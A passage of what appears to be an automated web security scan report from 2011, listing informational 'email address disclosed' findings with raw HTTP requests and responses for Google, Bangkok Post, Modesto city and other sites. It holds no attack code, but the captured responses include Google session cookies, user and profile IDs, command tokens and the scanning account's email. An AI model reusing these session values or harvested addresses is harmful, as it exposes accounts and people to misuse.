Content-Type: text/html; charset=UTF-8
Content-Length: 24211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.56. http://www.bangkokpost.com/forum/viewforum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewforum.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forum/viewforum.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.57. http://www.bangkokpost.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.58. http://www.bangkokpost.com/search/news-and-article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /search/news-and-article

Issue detail

The following email addresses were disclosed in the response:

Request

GET /search/news-and-article HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thailand's Sear
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.59. http://www.google.com/advanced_search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The following email address was disclosed in the response:

Request

GET /advanced_search HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:30:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
on(){m.prm&&m.prm()},Ua=function(a){s("m",function(){m.spn(a)})},Va=function(a){s("m",function(){m.spp(a)})};n("spn",Ua);n("spp",Va);Aa("gbd4",Ta);
if(_tvb("true",e)){var Wa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};o.prf=Wa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.60. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following email address was disclosed in the response:

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:30:13 GMT
Expires: Sun, 04 Sep 2011 04:30:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...
on(){m.prm&&m.prm()},Sa=function(a){y("m",function(){m.spn(a)})},Ta=function(a){y("m",function(){m.spp(a)})};n("spn",Sa);n("spp",Ta);za("gbd4",Ra);
if(_tvb("true",e)){var Ua={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Ua}
function Va(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
<script>var googlefinance = {i: ["f.b.id","Google Finance: Stock market quotes, news, currency conversions \u0026 more",0,0,"RV\u003d:ED\u003dus",0,"test@fastdial.net",["f.b.cf","XM1n5UOGucg.en_US.",0]
,[]
,0]
};</script>
...[SNIP]...

25.61. http://www.google.com/hostednews/afp/article/ALeqM5gm3VCeTz71UMLIhqucTh7x2Pzicw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /hostednews/afp/article/ALeqM5gm3VCeTz71UMLIhqucTh7x2Pzicw

Issue detail

The following email address was disclosed in the response:

Request

GET /hostednews/afp/article/ALeqM5gm3VCeTz71UMLIhqucTh7x2Pzicw HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Robots-Tag: noarchive
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:31:35 GMT
Expires: Sun, 04 Sep 2011 04:31:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>AFP: Indian plane makes emergency landing at Mumbai</title>
<meta http-equiv="Content-Type"
...[SNIP]...
on(){m.prm&&m.prm()},Sa=function(a){y("m",function(){m.spn(a)})},Ta=function(a){y("m",function(){m.spp(a)})};n("spn",Sa);n("spp",Ta);za("gbd4",Ra);
if(_tvb("true",e)){var Ua={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Ua}
function Va(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.62. http://www.google.com/hostednews/afp/article/ALeqM5jgTMTleLrfnZNS2m7IZ6da8aJZ9w  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /hostednews/afp/article/ALeqM5jgTMTleLrfnZNS2m7IZ6da8aJZ9w

Issue detail

The following email address was disclosed in the response:

Request

GET /hostednews/afp/article/ALeqM5jgTMTleLrfnZNS2m7IZ6da8aJZ9w HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Robots-Tag: noarchive
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:30:51 GMT
Expires: Sun, 04 Sep 2011 04:30:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>AFP: Thai FM plans first foreign trip &#39;alphabetically&#39;</title>
<meta http-equiv="Co
...[SNIP]...
on(){m.prm&&m.prm()},Sa=function(a){y("m",function(){m.spn(a)})},Ta=function(a){y("m",function(){m.spp(a)})};n("spn",Sa);n("spp",Ta);za("gbd4",Ra);
if(_tvb("true",e)){var Ua={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Ua}
function Va(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.63. http://www.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /maps

Issue detail

The following email address was disclosed in the response:

Request

GET /maps HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:37:06 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){y("m",function(){m.spn(a)})},Wa=function(a){y("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Xa}
function Ya(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
us/mapfiles/","/intl/en_us/mapfiles/","363c",0,,1,1,1,1,1,1,,,"http://cbk0.google.com",1,20,4096,,,,,,,,["rst","util"],["lt_c","pplhs","mg","stats"],,,1000,1,"maps_sv",4,,,1,,,"//gg.google.com/csi",0,"test@fastdial.net","",0,["http://khmdb0.google.com/kh?v=000006\x26","http://khmdb1.google.com/kh?v=000006\x26"],,"/maps/c",,,1,0,[["act_s",["act"]],["qopa",["act","qop","act_s"]],["ms",["info"]],["mv",["act"]],["cb_app
...[SNIP]...

25.64. http://www.google.com/preferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /preferences

Issue detail

The following email address was disclosed in the response:

Request

GET /preferences HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:30:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}.ts{border-collapse:collaps
...[SNIP]...
on(){m.prm&&m.prm()},Ua=function(a){s("m",function(){m.spn(a)})},Va=function(a){s("m",function(){m.spp(a)})};n("spn",Ua);n("spp",Va);Aa("gbd4",Ta);
if(_tvb("true",e)){var Wa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};o.prf=Wa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.65. http://www.google.com/quality_form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /quality_form

Issue detail

The following email address was disclosed in the response:

Request

GET /quality_form HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:32:09 GMT
Server: gws
Cache-Control: private
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Search</title><script>window.google={kEI:"Sf9iTruBFMrSiAKu97CjDg",getEI:function(a){var b;while(a&&!
...[SNIP]...
on(){m.prm&&m.prm()},Ua=function(a){s("m",function(){m.spn(a)})},Va=function(a){s("m",function(){m.spp(a)})};n("spn",Ua);n("spp",Va);Aa("gbd4",Ta);
if(_tvb("true",e)){var Wa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};o.prf=Wa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.66. http://www.google.com/reader/link  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /reader/link

Issue detail

The following email address was disclosed in the response:

Request

GET /reader/link HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
X-Reader-Google-Version: 546-000
X-Reader-User: 17465033393070012425
X-XSS-Protection: 0
Date: Sun, 04 Sep 2011 04:30:19 GMT
Expires: Sun, 04 Sep 2011 04:30:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><!--
Content-type: Preventing XSRF in IE.

-->
<head><title>Add a link to Google Reader</title>
<title>G
...[SNIP]...
<script type="text/javascript">var
_USER_ID = "17465033393070012425",
_USER_NAME = null,
_USER_PROFILE_ID = "108833413051392189817",
_USER_EMAIL = "test@fastdial.net",
_IS_BLOGGER_USER = false,
_SIGNUP_TIME_SEC = 0,
_COMMAND_TOKEN = "//PuUTA1qM1ejdgorbAqA_Jw",
_PUBLIC_USERNAME = null,
_IS_MULTILOGIN_ENABLED = false,
_LOGIN_URL = "",
_INPUT_STREAM_ID = "",
_START_T
...[SNIP]...
<b id="email-address">test@fastdial.net</b>
...[SNIP]...

25.67. http://www.google.com/reader/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /reader/view/

Issue detail

The following email address was disclosed in the response:

Request

GET /reader/view/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
X-Reader-Google-Version: 546-000
Set-Cookie: SID=DQAAAO4AAAAdw-kaWu-Fwov6yR3LF5btRLGDJizUC9Raw-GqwLpasp50X9kbEGhwdFFWxcYXI6vBoZEjrRXVWtyYlNaY91rEqAzamUbDKHampxxkPLqMizg3O5oUyc70ZHiy4dZUyuRHQCXe2W5mn8nTZG6xBVeakd7uOtTtTw-4Eq-poXmbgVf-0J8etvwWsuVWzeC-uRjBpg6L4g-5Dw-fRjaHoozF0M7YxWMNbpqla2dOd6JS_ObnJKhIR1Y2k1Q-6HT1rHp85PXH5dE8SArpn0A5Ov1JEw-6AL1W9up9w8rOdgP7XrJglYeTt2h6xTlDPnLG2mY;Domain=.google.com;Path=/;Expires=Wed, 01-Sep-2021 04:30:17 GMT
X-Reader-User: 17465033393070012425
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 04:30:17 GMT
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><!--
Content-type: Preventing XSRF in IE.

-->
<head><meta http-equiv="X-UA-Compatible" content="chrome=
...[SNIP]...
<script type="text/javascript">var
_USER_ID = "17465033393070012425",
_USER_NAME = "RTFM",
_USER_PROFILE_ID = "108833413051392189817",
_USER_EMAIL = "test@fastdial.net",
_IS_BLOGGER_USER = false,
_SIGNUP_TIME_SEC = 0,
_COMMAND_TOKEN = "//O9IDbcNvFuhg5MJCFOv1gQ",
_PUBLIC_USERNAME = null,
_IS_MULTILOGIN_ENABLED = false,
_LOGIN_URL = "https://www.google.com/accounts/Se
...[SNIP]...
on(){m.prm&&m.prm()},Ra=function(a){y("m",function(){m.spn(a)})},Sa=function(a){y("m",function(){m.spp(a)})};n("spn",Ra);n("spp",Sa);ya("gbd4",Qa);
if(_tvb("true",e)){var Ta={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Ta}
function Ua(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.68. http://www.google.com/support/websearch/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/websearch/bin/answer.py

Issue detail

The following email address was disclosed in the response:

Request

GET /support/websearch/bin/answer.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:30:37 GMT
Expires: Sun, 04 Sep 2011 04:30:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=""
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">


</pre>
<script
...[SNIP]...
<strong>test@fastdial.net</strong>
...[SNIP]...

25.69. http://www.google.com/webhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /webhp

Issue detail

The following email address was disclosed in the response:

Request

GET /webhp HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:30:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world&#39;s information, including webpages, images, videos a
...[SNIP]...
on(){m.prm&&m.prm()},Ua=function(a){s("m",function(){m.spn(a)})},Va=function(a){s("m",function(){m.spp(a)})};n("spn",Ua);n("spp",Va);Aa("gbd4",Ta);
if(_tvb("true",e)){var Wa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};o.prf=Wa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.70. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:UhY4qMXCvp3NTNKf--q2r1Nifc6HrQ:L2EY7-CY6SBaF84x;Path=/accounts;Expires=Tue, 03-Sep-2013 04:39:06 GMT;Secure;HttpOnly
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Sun, 04 Sep 2011 04:39:06 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11097
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

25.71. https://www.google.com/adsense/support/bin/request.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Issue detail

The following email address was disclosed in the response:

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D799abfc4d86c130b%26v%3D2%26c%3De08e7d44%26s%3D4e6300ee%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 04-Sep-2011 05:09:10 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:39:10 GMT
Expires: Sun, 04 Sep 2011 04:39:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">


</pre>
<scrip
...[SNIP]...
<strong>test@fastdial.net</strong>
...[SNIP]...

25.72. https://www.gotomeeting.com/t/gcon/2011_Q3/Contextual_CC/160x600/g2m_HDFaceslp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gotomeeting.com
Path:   /t/gcon/2011_Q3/Contextual_CC/160x600/g2m_HDFaceslp

Issue detail

The following email address was disclosed in the response:

Request

GET /t/gcon/2011_Q3/Contextual_CC/160x600/g2m_HDFaceslp HTTP/1.1
Host: www.gotomeeting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Sun, 04 Sep 2011 04:39:20 GMT
Server: Apache
Location: https://www4.gotomeeting.com/t/gcon/2011_Q3/Contextual_CC/160x600/g2m_HDFaceslp?Portal=www.gotomeeting.com
Content-Length: 409
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_mc-h2n.dpn-qb-443=ffffffffdbd3658145525d5f4f58455e445a4a42378b;expires=Sun, 04-Sep-2011 04:41:20 GMT;path=/;secure;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www4.gotomeeting.com/t/gcon/2011_Q3/Con
...[SNIP]...
<a href="mailto:webmaster@citrixonline.com">
...[SNIP]...

25.73. http://www.mid-day.com/news/index.htm/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mid-day.com
Path:   /news/index.htm/x26amp

Issue detail

The following email address was disclosed in the response:

Request

GET /news/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:27 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>National News, In
...[SNIP]...
<a href="mailto:feedback@mid-day.com">
...[SNIP]...

25.74. http://www.modestogov.com/departments/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modestogov.com
Path:   /departments/x26amp

Issue detail

The following email address was disclosed in the response:

Request

GET /departments/x26amp HTTP/1.1
Host: www.modestogov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:37:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 11042
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" dir="ltr">
<head>
       <title>City of Modesto - 404 - File Not Found</title>
       <!--include
...[SNIP]...
<a href="mailto:webmaster@modestogov.com">
       webmaster@modestogov.com</a>
...[SNIP]...

25.75. http://www.modestogov.com/mpd/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modestogov.com
Path:   /mpd/x26amp

Issue detail

The following email address was disclosed in the response:

Request

GET /mpd/x26amp HTTP/1.1
Host: www.modestogov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:37:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 11042
Content-Type: text/html
Cache-control: private

